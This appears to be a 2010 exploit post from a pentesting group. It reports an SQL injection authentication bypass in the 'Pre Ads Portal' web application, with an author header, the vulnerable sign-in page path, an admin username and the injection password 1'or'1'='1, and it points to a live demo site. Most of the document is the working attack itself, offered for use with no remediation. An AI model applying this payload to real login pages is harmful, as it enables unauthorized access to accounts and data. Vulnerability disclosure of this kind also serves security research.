Pre Ads Portal suffers from a remote SQL injection vulnerability that allows for authentication bypass.
e195931f01fd2ddeda56f0b32816a3d132391b02a06412e26e96826981aa426e
In The Name Of GOD
[+] Exploit Title: PRE ADS PORTAL SQL Bypass Vulnerability
[+] Date: 2010-11-13
[+] Author : Cru3l.b0y
[+] Software Link: http://www.preproject.com/ads.asp
[+] Price : 125.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
go to /signinform.php
Username : admin
Password : 1'or'1'='1
[+] Demo: http://ads.preproject.com/signinform.php